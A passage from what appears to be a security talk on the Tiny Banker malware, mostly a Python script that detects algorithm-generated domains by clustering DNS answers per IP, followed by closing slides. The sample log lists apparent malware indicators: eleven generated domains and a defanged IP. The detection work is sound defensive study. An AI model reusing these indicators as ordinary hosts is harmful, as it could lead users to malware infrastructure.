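    longest_run = max(map(len, CONSONANT_RUN.findall(label)), default=0)
    return vowel_ratio < 0.25 or longest_run >= 4


def parse_lines(lines: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Yield (domain, ip) from 'domain > ip' records; other lines are skipped."""
    for line in lines:
        m = LINE_RX.match(line)
        if m:
            yield m.group("domain").lower(), refang(m.group("ip"))


def cluster_by_ip(lines: Iterable[str], min_domains: int = 5,
                  min_dga_fraction: float = 0.5) -> List[Cluster]:
    """Flag IPs answered for many distinct names, most of which look generated."""
    by_ip: Dict[str, Set[str]] = defaultdict(set)
    for domain, ip in parse_lines(lines):
        by_ip[ip].add(domain)
    clusters = []
    for ip, domains in by_ip.items():
        if len(domains) < min_domains:
            continue
        dga = sum(looks_generated(registrable_label(d)) for d in domains)
        if dga / len(domains) >= min_dga_fraction:
            clusters.append(Cluster(ip, sorted(domains), dga))
    return clusters


# Sample input: the slide's query list, then constructed benign records
# (shared hosting for several example.* names, and one lone lookup).
SAMPLE_DNS_LOG = [
    "vqwgqnbtectr.pw > 216.218.185[.]162",
    "sucjuv.in > 216.218.185[.]162",
    "hbsnmsmlsvib.in > 216.218.185[.]162",
    "ehhrupqrycm.pw > 216.218.185[.]162",
    "uatuwc.pw > 216.218.185[.]162",
    "fpexkrdtxpfs.in > 216.218.185[.]162",
    "okzhyctznzft.pw > 216.218.185[.]162",
    "zawmg.pw > 216.218.185[.]162",
    "lxpcbahva.pw > 216.218.185[.]162",
    "bifcp.in > 216.218.185[.]162",
    "pojde.in > 216.218.185[.]162",
    "And many many more....",  # free text on the slide; parser skips it
    "www.example.com > 203.0.113.10",
    "mail.example.com > 203.0.113.10",
    "news.example.net > 203.0.113.10",
    "static.example.org > 203.0.113.10",
    "login.example.net > 203.0.113.10",
    "time.example.org > 198.51.100.7",
]

if __name__ == "__main__":
    for c in cluster_by_ip(SAMPLE_DNS_LOG):
        print(f"{c.ip}: {len(c.domains)} names, {c.dga_like} look generated")
```

The per-label heuristic is deliberately weak (three of the eleven slide names, such as `sucjuv` and `pojde`, pass it), which is why the decision is made on the cluster rather than on any single name: eight of eleven generated-looking labels behind one address is the signal, and five ordinary names on one shared-hosting address is not.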
  • 30. Tiny Banker
  • 31. Tiny Banker
  • 32. Tiny Banker
  • 33. Tiny Banker
  • 34. Demo https://www.youtube.com/watch?v=Hc7h-rIyd5A
  • 35. Q/A • Feedback • Joshua.chou@cybereason.com • jdudeoflife
  • 36. Thank you. www.cybereason.com